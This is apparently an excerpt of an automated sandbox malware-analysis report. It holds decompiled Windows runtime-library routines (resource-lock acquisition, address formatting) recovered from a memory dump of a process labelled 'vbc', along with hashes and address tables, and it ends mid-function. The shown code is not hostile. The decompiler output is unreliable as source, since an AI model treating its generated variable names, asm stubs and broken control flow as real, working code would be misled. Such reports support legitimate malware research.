                                              • Opcode Fuzzy Hash: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                              • Instruction Fuzzy Hash: 5D610571900695AACF28DF69C8C4CBEBBB6FF96304718C16DE4D6C7642D634EA40CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 50%
                                              			E008C0554(signed int _a4, char _a8) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int* _t49;
                                              				signed int _t51;
                                              				signed int _t56;
                                              				signed int _t58;
                                              				signed int _t61;
                                              				signed int _t63;
                                              				void* _t66;
                                              				intOrPtr _t67;
                                              				void* _t69;
                                              				signed int _t70;
                                              				void* _t75;
                                              				signed int _t81;
                                              				signed int _t84;
                                              				void* _t86;
                                              				signed int _t93;
                                              				signed int _t96;
                                              				intOrPtr _t105;
                                              				signed int _t107;
                                              				void* _t110;
                                              				signed int _t115;
                                              				signed int* _t119;
                                              				void* _t125;
                                              				void* _t126;
                                              				signed int _t128;
                                              				signed int _t130;
                                              				signed int _t138;
                                              				signed int _t144;
                                              				void* _t158;
                                              				void* _t159;
                                              				void* _t160;
                                              
                                              				_t96 = _a4;
                                              				_t115 =  *(_t96 + 0x28);
                                              				_push(_t138);
                                              				if(_t115 < 0) {
                                              					_t105 =  *[fs:0x18];
                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                              						goto L6;
                                              					} else {
                                              						__eflags = _t115 | 0xffffffff;
                                              						asm("lock xadd [eax], edx");
                                              						return 1;
                                              					}
                                              				} else {
                                              					L6:
                                              					_push(_t128);
                                              					while(1) {
                                              						L7:
                                              						__eflags = _t115;
                                              						if(_t115 >= 0) {
                                              							break;
                                              						}
                                              						__eflags = _a8;
                                              						if(_a8 == 0) {
                                              							__eflags = 0;
                                              							return 0;
                                              						} else {
                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                              							_t49 = _t96 + 0x1c;
                                              							_t106 = 1;
                                              							asm("lock xadd [edx], ecx");
                                              							_t115 =  *(_t96 + 0x28);
                                              							__eflags = _t115;
                                              							if(_t115 < 0) {
                                              								L23:
                                              								_t130 = 0;
                                              								__eflags = 0;
                                              								while(1) {
                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                              									asm("sbb esi, esi");
                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
                                              									_push(_t144);
                                              									_push(0);
                                              									_t51 = L0087F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                              									__eflags = _t51 - 0x102;
                                              									if(_t51 != 0x102) {
                                              										break;
                                              									}
                                              									_t106 =  *(_t144 + 4);
                                              									_t126 =  *_t144;
                                              									_t86 = L008C4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                              									_push(_t126);
                                              									_push(_t86);
                                              									L008D3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                              									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                              									_t130 = _t130 + 1;
                                              									_t160 = _t158 + 0x28;
                                              									__eflags = _t130 - 2;
                                              									if(__eflags > 0) {
                                              										E0090217A(_t106, __eflags, _t96);
                                              									}
                                              									_push("RTL: Re-Waiting\n");
                                              									_push(0);
                                              									_push(0x65);
                                              									L008D3F92();
                                              									_t158 = _t160 + 0xc;
                                              								}
                                              								__eflags = _t51;
                                              								if(__eflags < 0) {
                                              									_push(_t51);
                                              									L008C3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                              									asm("int3");
                                              									while(1) {
                                              										L32:
                                              										__eflags = _a8;
                                              										if(_a8 == 0) {
                                              											break;
                                              										}
                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                              										_t119 = _t96 + 0x24;
                                              										_t107 = 1;
                                              										asm("lock xadd [eax], ecx");
                                              										_t56 =  *(_t96 + 0x28);
                                              										_a4 = _t56;
                                              										__eflags = _t56;
                                              										if(_t56 != 0) {
                                              											L40:
                                              											_t128 = 0;
                                              											__eflags = 0;
                                              											while(1) {
                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                              												asm("sbb esi, esi");
                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
                                              												_push(_t138);
                                              												_push(0);
                                              												_t58 = L0087F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                              												__eflags = _t58 - 0x102;
                                              												if(_t58 != 0x102) {
                                              													break;
                                              												}
                                              												_t107 =  *(_t138 + 4);
                                              												_t125 =  *_t138;
                                              												_t75 = L008C4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                              												_push(_t125);
                                              												_push(_t75);
                                              												L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                              												L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                              												_t128 = _t128 + 1;
                                              												_t159 = _t158 + 0x28;
                                              												__eflags = _t128 - 2;
                                              												if(__eflags > 0) {
                                              													E0090217A(_t107, __eflags, _t96);
                                              												}
                                              												_push("RTL: Re-Waiting\n");
                                              												_push(0);
                                              												_push(0x65);
                                              												L008D3F92();
                                              												_t158 = _t159 + 0xc;
                                              											}
                                              											__eflags = _t58;
                                              											if(__eflags < 0) {
                                              												_push(_t58);
                                              												L008C3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                              												asm("int3");
                                              												_t61 =  *_t107;
                                              												 *_t107 = 0;
                                              												__eflags = _t61;
                                              												if(_t61 == 0) {
                                              													L1:
                                              													_t63 = E008A5384(_t138 + 0x24);
                                              													if(_t63 != 0) {
                                              														goto L52;
                                              													} else {
                                              														goto L2;
                                              													}
                                              												} else {
                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                              													_push( &_a4);
                                              													_push(_t61);
                                              													_t70 = L0087F970( *((intOrPtr*)(_t138 + 0x18)));
                                              													__eflags = _t70;
                                              													if(__eflags >= 0) {
                                              														goto L1;
                                              													} else {
                                              														_push(_t70);
                                              														L008C3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                              														L52:
                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                              														_push( &_a4);
                                              														_push(1);
                                              														_t63 = L0087F970( *((intOrPtr*)(_t138 + 0x20)));
                                              														__eflags = _t63;
                                              														if(__eflags >= 0) {
                                              															L2:
                                              															return _t63;
                                              														} else {
                                              															_push(_t63);
                                              															L008C3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                              															_push( &_a4);
                                              															_push(1);
                                              															_t63 = L0087F970( *((intOrPtr*)(_t138 + 0x20)));
                                              															__eflags = _t63;
                                              															if(__eflags >= 0) {
                                              																goto L2;
                                              															} else {
                                              																_push(_t63);
                                              																_t66 = L008C3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                              																asm("int3");
                                              																while(1) {
                                              																	_t110 = _t66;
                                              																	__eflags = _t66 - 1;
                                              																	if(_t66 != 1) {
                                              																		break;
                                              																	}
                                              																	_t128 = _t128 | 0xffffffff;
                                              																	_t66 = _t110;
                                              																	asm("lock cmpxchg [ebx], edi");
                                              																	__eflags = _t66 - _t110;
                                              																	if(_t66 != _t110) {
                                              																		continue;
                                              																	} else {
                                              																		_t67 =  *[fs:0x18];
                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                              																		return _t67;
                                              																	}
                                              																	goto L59;
                                              																}
                                              																E008A5329(_t110, _t138);
                                              																_t69 = E008A53A5(_t138, 1);
                                              																return _t69;
                                              															}
                                              														}
                                              													}
                                              												}
                                              											} else {
                                              												_t56 =  *(_t96 + 0x28);
                                              												goto L3;
                                              											}
                                              										} else {
                                              											_t107 =  *_t119;
                                              											__eflags = _t107;
                                              											if(__eflags > 0) {
                                              												while(1) {
                                              													_t81 = _t107;
                                              													asm("lock cmpxchg [edi], esi");
                                              													__eflags = _t81 - _t107;
                                              													if(_t81 == _t107) {
                                              														break;
                                              													}
                                              													_t107 = _t81;
                                              													__eflags = _t81;
                                              													if(_t81 > 0) {
                                              														continue;
                                              													}
                                              													break;
                                              												}
                                              												_t56 = _a4;
                                              												__eflags = _t107;
                                              											}
                                              											if(__eflags != 0) {
                                              												while(1) {
                                              													L3:
                                              													__eflags = _t56;
                                              													if(_t56 != 0) {
                                              														goto L32;
                                              													}
                                              													_t107 = _t107 | 0xffffffff;
                                              													_t56 = 0;
                                              													asm("lock cmpxchg [edx], ecx");
                                              													__eflags = 0;
                                              													if(0 != 0) {
                                              														continue;
                                              													} else {
                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              														return 1;
                                              													}
                                              													goto L59;
                                              												}
                                              												continue;
                                              											} else {
                                              												goto L40;
                                              											}
                                              										}
                                              										goto L59;
                                              									}
                                              									__eflags = 0;
                                              									return 0;
                                              								} else {
                                              									_t115 =  *(_t96 + 0x28);
                                              									continue;
                                              								}
                                              							} else {
                                              								_t106 =  *_t49;
                                              								__eflags = _t106;
                                              								if(__eflags > 0) {
                                              									while(1) {
                                              										_t93 = _t106;
                                              										asm("lock cmpxchg [edi], esi");
                                              										__eflags = _t93 - _t106;
                                              										if(_t93 == _t106) {
                                              											break;
                                              										}
                                              										_t106 = _t93;
                                              										__eflags = _t93;
                                              										if(_t93 > 0) {
                                              											continue;
                                              										}
                                              										break;
                                              									}
                                              									__eflags = _t106;
                                              								}
                                              								if(__eflags != 0) {
                                              									continue;
                                              								} else {
                                              									goto L23;
                                              								}
                                              							}
                                              						}
                                              						goto L59;
                                              					}
                                              					_t84 = _t115;
                                              					asm("lock cmpxchg [esi], ecx");
                                              					__eflags = _t84 - _t115;
                                              					if(_t84 != _t115) {
                                              						_t115 = _t84;
                                              						goto L7;
                                              					} else {
                                              						return 1;
                                              					}
                                              				}
                                              				L59:
                                              			}




































                                              0x008c055a
                                              0x008c055d
                                              0x008c0563
                                              0x008c0566
                                              0x008c05d8
                                              0x008c05e2
                                              0x008c05e5
                                              0x00000000
                                              0x008c05e7
                                              0x008c05e7
                                              0x008c05ea
                                              0x008c05f3
                                              0x008c05f3
                                              0x008c0568
                                              0x008c0568
                                              0x008c0568
                                              0x008c0569
                                              0x008c0569
                                              0x008c0569
                                              0x008c056b
                                              0x00000000
                                              0x00000000
                                              0x008e217f
                                              0x008e2183
                                              0x008e225b
                                              0x008e225f
                                              0x008e2189
                                              0x008e218c
                                              0x008e218f
                                              0x008e2194
                                              0x008e2199
                                              0x008e219d
                                              0x008e21a0
                                              0x008e21a2
                                              0x008e21ce
                                              0x008e21ce
                                              0x008e21ce
                                              0x008e21d0
                                              0x008e21d6
                                              0x008e21de
                                              0x008e21e2
                                              0x008e21e8
                                              0x008e21e9
                                              0x008e21ec
                                              0x008e21f1
                                              0x008e21f6
                                              0x00000000
                                              0x00000000
                                              0x008e21f8
                                              0x008e21fb
                                              0x008e2206
                                              0x008e220b
                                              0x008e220c
                                              0x008e2217
                                              0x008e2226
                                              0x008e222b
                                              0x008e222c
                                              0x008e222f
                                              0x008e2232
                                              0x008e2235
                                              0x008e2235
                                              0x008e223a
                                              0x008e223f
                                              0x008e2241
                                              0x008e2243
                                              0x008e2248
                                              0x008e2248
                                              0x008e224d
                                              0x008e224f
                                              0x008e2262
                                              0x008e2263
                                              0x008e2268
                                              0x008e2269
                                              0x008e2269
                                              0x008e2269
                                              0x008e226d
                                              0x00000000
                                              0x00000000
                                              0x008e2276
                                              0x008e2279
                                              0x008e227e
                                              0x008e2283
                                              0x008e2287
                                              0x008e228a
                                              0x008e228d
                                              0x008e228f
                                              0x008e22bc
                                              0x008e22bc
                                              0x008e22bc
                                              0x008e22be
                                              0x008e22c4
                                              0x008e22cc
                                              0x008e22d0
                                              0x008e22d6
                                              0x008e22d7
                                              0x008e22da
                                              0x008e22df
                                              0x008e22e4
                                              0x00000000
                                              0x00000000
                                              0x008e22e6
                                              0x008e22e9
                                              0x008e22f4
                                              0x008e22f9
                                              0x008e22fa
                                              0x008e2305
                                              0x008e2314
                                              0x008e2319
                                              0x008e231a
                                              0x008e231d
                                              0x008e2320
                                              0x008e2323
                                              0x008e2323
                                              0x008e2328
                                              0x008e232d
                                              0x008e232f
                                              0x008e2331
                                              0x008e2336
                                              0x008e2336
                                              0x008e233b
                                              0x008e233d
                                              0x008e2350
                                              0x008e2351
                                              0x008e2356
                                              0x008e2359
                                              0x008e2359
                                              0x008e235b
                                              0x008e235d
                                              0x008a5367
                                              0x008a536b
                                              0x008a5372
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e2363
                                              0x008e2363
                                              0x008e2369
                                              0x008e236a
                                              0x008e236c
                                              0x008e2371
                                              0x008e2373
                                              0x00000000
                                              0x008e2379
                                              0x008e2379
                                              0x008e237a
                                              0x008e237f
                                              0x008e237f
                                              0x008e2385
                                              0x008e2386
                                              0x008e2389
                                              0x008e238e
                                              0x008e2390
                                              0x008a5378
                                              0x008a537c
                                              0x008e2396
                                              0x008e2396
                                              0x008e2397
                                              0x008e239c
                                              0x008e23a2
                                              0x008e23a3
                                              0x008e23a6
                                              0x008e23ab
                                              0x008e23ad
                                              0x00000000
                                              0x008e23b3
                                              0x008e23b3
                                              0x008e23b4
                                              0x008e23b9
                                              0x008e23ba
                                              0x008e23ba
                                              0x008e23bc
                                              0x008e23bf
                                              0x00000000
                                              0x00000000
                                              0x008d9153
                                              0x008d9158
                                              0x008d915a
                                              0x008d915e
                                              0x008d9160
                                              0x00000000
                                              0x008d9166
                                              0x008d9166
                                              0x008d9171
                                              0x008d9176
                                              0x008d9176
                                              0x00000000
                                              0x008d9160
                                              0x008e23c6
                                              0x008e23ce
                                              0x008e23d7
                                              0x008e23d7
                                              0x008e23ad
                                              0x008e2390
                                              0x008e2373
                                              0x008e233f
                                              0x008e233f
                                              0x00000000
                                              0x008e233f
                                              0x008e2291
                                              0x008e2291
                                              0x008e2293
                                              0x008e2295
                                              0x008e229a
                                              0x008e22a1
                                              0x008e22a3
                                              0x008e22a7
                                              0x008e22a9
                                              0x00000000
                                              0x00000000
                                              0x008e22ab
                                              0x008e22ad
                                              0x008e22af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e22af
                                              0x008e22b1
                                              0x008e22b4
                                              0x008e22b4
                                              0x008e22b6
                                              0x008a53be
                                              0x008a53be
                                              0x008a53be
                                              0x008a53c0
                                              0x00000000
                                              0x00000000
                                              0x008a53cb
                                              0x008a53ce
                                              0x008a53d0
                                              0x008a53d4
                                              0x008a53d6
                                              0x00000000
                                              0x008a53d8
                                              0x008a53e3
                                              0x008a53ea
                                              0x008a53ea
                                              0x00000000
                                              0x008a53d6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e22b6
                                              0x00000000
                                              0x008e228f
                                              0x008e2349
                                              0x008e234d
                                              0x008e2251
                                              0x008e2251
                                              0x00000000
                                              0x008e2251
                                              0x008e21a4
                                              0x008e21a4
                                              0x008e21a6
                                              0x008e21a8
                                              0x008e21ac
                                              0x008e21b6
                                              0x008e21b8
                                              0x008e21bc
                                              0x008e21be
                                              0x00000000
                                              0x00000000
                                              0x008e21c0
                                              0x008e21c2
                                              0x008e21c4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e21c4
                                              0x008e21c6
                                              0x008e21c6
                                              0x008e21c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e21c8
                                              0x008e21a2
                                              0x00000000
                                              0x008e2183
                                              0x008c057b
                                              0x008c057d
                                              0x008c0581
                                              0x008c0583
                                              0x008e2178
                                              0x00000000
                                              0x008c0589
                                              0x008c058f
                                              0x008c058f
                                              0x008c0583
                                              0x00000000

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-4236105082
                                              • Opcode ID: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                              • Instruction ID: 9370d6c57b9bafe922966190555a88ba70e3a807648f5901659822d51d1fe5d7
                                              • Opcode Fuzzy Hash: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                              • Instruction Fuzzy Hash: AC515971B002456BEB249B19CC82F6673ADFF85710F218269FD14DB385E931EC418BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 64%
                                              			E008C14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                              				signed int _v8;
                                              				char _v10;
                                              				char _v140;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t24;
                                              				void* _t26;
                                              				signed int _t29;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				intOrPtr _t45;
                                              				void* _t51;
                                              				intOrPtr* _t52;
                                              				void* _t54;
                                              				signed int _t57;
                                              				void* _t58;
                                              
                                              				_t51 = __edx;
                                              				_t24 =  *0x962088; // 0x74f6ce69
                                              				_v8 = _t24 ^ _t57;
                                              				_t45 = _a16;
                                              				_t53 = _a4;
                                              				_t52 = _a20;
                                              				if(_a4 == 0 || _t52 == 0) {
                                              					L10:
                                              					_t26 = 0xc000000d;
                                              				} else {
                                              					if(_t45 == 0) {
                                              						if( *_t52 == _t45) {
                                              							goto L3;
                                              						} else {
                                              							goto L10;
                                              						}
                                              					} else {
                                              						L3:
                                              						_t28 =  &_v140;
                                              						if(_a12 != 0) {
                                              							_push("[");
                                              							_push(0x41);
                                              							_push( &_v140);
                                              							_t29 = L008B7707();
                                              							_t58 = _t58 + 0xc;
                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                              						}
                                              						_t54 = E008C13CB(_t53, _t28);
                                              						if(_a8 != 0) {
                                              							_t34 = L008B7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                              							_t58 = _t58 + 0x10;
                                              							_t54 = _t54 + _t34 * 2;
                                              						}
                                              						if(_a12 != 0) {
                                              							_t40 = L008B7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                              							_t58 = _t58 + 0x10;
                                              							_t54 = _t54 + _t40 * 2;
                                              						}
                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                              						 *_t52 = _t53;
                                              						if( *_t52 < _t53) {
                                              							goto L10;
                                              						} else {
                                              							E00882340(_t45,  &_v140, _t53 + _t53);
                                              							_t26 = 0;
                                              						}
                                              					}
                                              				}
                                              				return E0088E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                              			}




















                                              0x008c14c0
                                              0x008c14cb
                                              0x008c14d2
                                              0x008c14d6
                                              0x008c14da
                                              0x008c14de
                                              0x008c14e3
                                              0x008c157a
                                              0x008c157a
                                              0x008c14f1
                                              0x008c14f3
                                              0x008eea0f
                                              0x00000000
                                              0x008eea15
                                              0x00000000
                                              0x008eea15
                                              0x008c14f9
                                              0x008c14f9
                                              0x008c14fe
                                              0x008c1504
                                              0x008eea1a
                                              0x008eea1f
                                              0x008eea21
                                              0x008eea22
                                              0x008eea27
                                              0x008eea2a
                                              0x008eea2a
                                              0x008c1515
                                              0x008c1517
                                              0x008c156d
                                              0x008c1572
                                              0x008c1575
                                              0x008c1575
                                              0x008c151e
                                              0x008eea50
                                              0x008eea55
                                              0x008eea58
                                              0x008eea58
                                              0x008c152e
                                              0x008c1531
                                              0x008c1533
                                              0x00000000
                                              0x008c1535
                                              0x008c1541
                                              0x008c1549
                                              0x008c1549
                                              0x008c1533
                                              0x008c14f3
                                              0x008c1559

                                              APIs
                                              • ___swprintf_l.LIBCMT ref: 008EEA22
                                                • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
                                                • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490
                                              • ___swprintf_l.LIBCMT ref: 008C156D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                              • Instruction ID: 59f404ca7fc0b26f684ea4dc7bb352404320c3bd97eebb5d670a4339af528709
                                              • Opcode Fuzzy Hash: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                              • Instruction Fuzzy Hash: E72184729006199BCF21EE58CC85FEA73BCFB91704F544159F846D3241DB74EA588BD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 45%
                                              			E008A53A5(signed int _a4, char _a8) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t32;
                                              				signed int _t37;
                                              				signed int _t40;
                                              				signed int _t42;
                                              				void* _t45;
                                              				intOrPtr _t46;
                                              				void* _t48;
                                              				signed int _t49;
                                              				void* _t51;
                                              				signed int _t57;
                                              				signed int _t64;
                                              				signed int _t71;
                                              				void* _t74;
                                              				intOrPtr _t78;
                                              				signed int* _t79;
                                              				void* _t85;
                                              				signed int _t86;
                                              				signed int _t92;
                                              				void* _t104;
                                              				void* _t105;
                                              
                                              				_t64 = _a4;
                                              				_t32 =  *(_t64 + 0x28);
                                              				_t71 = _t64 + 0x28;
                                              				_push(_t92);
                                              				if(_t32 < 0) {
                                              					_t78 =  *[fs:0x18];
                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                              						goto L3;
                                              					} else {
                                              						__eflags = _t32 | 0xffffffff;
                                              						asm("lock xadd [ecx], eax");
                                              						return 1;
                                              					}
                                              				} else {
                                              					L3:
                                              					_push(_t86);
                                              					while(1) {
                                              						L4:
                                              						__eflags = _t32;
                                              						if(_t32 == 0) {
                                              							break;
                                              						}
                                              						__eflags = _a8;
                                              						if(_a8 == 0) {
                                              							__eflags = 0;
                                              							return 0;
                                              						} else {
                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                              							_t79 = _t64 + 0x24;
                                              							_t71 = 1;
                                              							asm("lock xadd [eax], ecx");
                                              							_t32 =  *(_t64 + 0x28);
                                              							_a4 = _t32;
                                              							__eflags = _t32;
                                              							if(_t32 != 0) {
                                              								L19:
                                              								_t86 = 0;
                                              								__eflags = 0;
                                              								while(1) {
                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                              									asm("sbb esi, esi");
                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009601c0;
                                              									_push(_t92);
                                              									_push(0);
                                              									_t37 = L0087F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                              									__eflags = _t37 - 0x102;
                                              									if(_t37 != 0x102) {
                                              										break;
                                              									}
                                              									_t71 =  *(_t92 + 4);
                                              									_t85 =  *_t92;
                                              									_t51 = L008C4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                              									_push(_t85);
                                              									_push(_t51);
                                              									L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                              									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                              									_t86 = _t86 + 1;
                                              									_t105 = _t104 + 0x28;
                                              									__eflags = _t86 - 2;
                                              									if(__eflags > 0) {
                                              										E0090217A(_t71, __eflags, _t64);
                                              									}
                                              									_push("RTL: Re-Waiting\n");
                                              									_push(0);
                                              									_push(0x65);
                                              									L008D3F92();
                                              									_t104 = _t105 + 0xc;
                                              								}
                                              								__eflags = _t37;
                                              								if(__eflags < 0) {
                                              									_push(_t37);
                                              									L008C3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                              									asm("int3");
                                              									_t40 =  *_t71;
                                              									 *_t71 = 0;
                                              									__eflags = _t40;
                                              									if(_t40 == 0) {
                                              										L1:
                                              										_t42 = E008A5384(_t92 + 0x24);
                                              										if(_t42 != 0) {
                                              											goto L31;
                                              										} else {
                                              											goto L2;
                                              										}
                                              									} else {
                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                              										_push( &_a4);
                                              										_push(_t40);
                                              										_t49 = L0087F970( *((intOrPtr*)(_t92 + 0x18)));
                                              										__eflags = _t49;
                                              										if(__eflags >= 0) {
                                              											goto L1;
                                              										} else {
                                              											_push(_t49);
                                              											L008C3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                              											L31:
                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                              											_push( &_a4);
                                              											_push(1);
                                              											_t42 = L0087F970( *((intOrPtr*)(_t92 + 0x20)));
                                              											__eflags = _t42;
                                              											if(__eflags >= 0) {
                                              												L2:
                                              												return _t42;
                                              											} else {
                                              												_push(_t42);
                                              												L008C3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                              												_push( &_a4);
                                              												_push(1);
                                              												_t42 = L0087F970( *((intOrPtr*)(_t92 + 0x20)));
                                              												__eflags = _t42;
                                              												if(__eflags >= 0) {
                                              													goto L2;
                                              												} else {
                                              													_push(_t42);
                                              													_t45 = L008C3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                              													asm("int3");
                                              													while(1) {
                                              														_t74 = _t45;
                                              														__eflags = _t45 - 1;
                                              														if(_t45 != 1) {
                                              															break;
                                              														}
                                              														_t86 = _t86 | 0xffffffff;
                                              														_t45 = _t74;
                                              														asm("lock cmpxchg [ebx], edi");
                                              														__eflags = _t45 - _t74;
                                              														if(_t45 != _t74) {
                                              															continue;
                                              														} else {
                                              															_t46 =  *[fs:0x18];
                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                              															return _t46;
                                              														}
                                              														goto L38;
                                              													}
                                              													E008A5329(_t74, _t92);
                                              													_push(1);
                                              													_t48 = E008A53A5(_t92);
                                              													return _t48;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								} else {
                                              									_t32 =  *(_t64 + 0x28);
                                              									continue;
                                              								}
                                              							} else {
                                              								_t71 =  *_t79;
                                              								__eflags = _t71;
                                              								if(__eflags > 0) {
                                              									while(1) {
                                              										_t57 = _t71;
                                              										asm("lock cmpxchg [edi], esi");
                                              										__eflags = _t57 - _t71;
                                              										if(_t57 == _t71) {
                                              											break;
                                              										}
                                              										_t71 = _t57;
                                              										__eflags = _t57;
                                              										if(_t57 > 0) {
                                              											continue;
                                              										}
                                              										break;
                                              									}
                                              									_t32 = _a4;
                                              									__eflags = _t71;
                                              								}
                                              								if(__eflags != 0) {
                                              									continue;
                                              								} else {
                                              									goto L19;
                                              								}
                                              							}
                                              						}
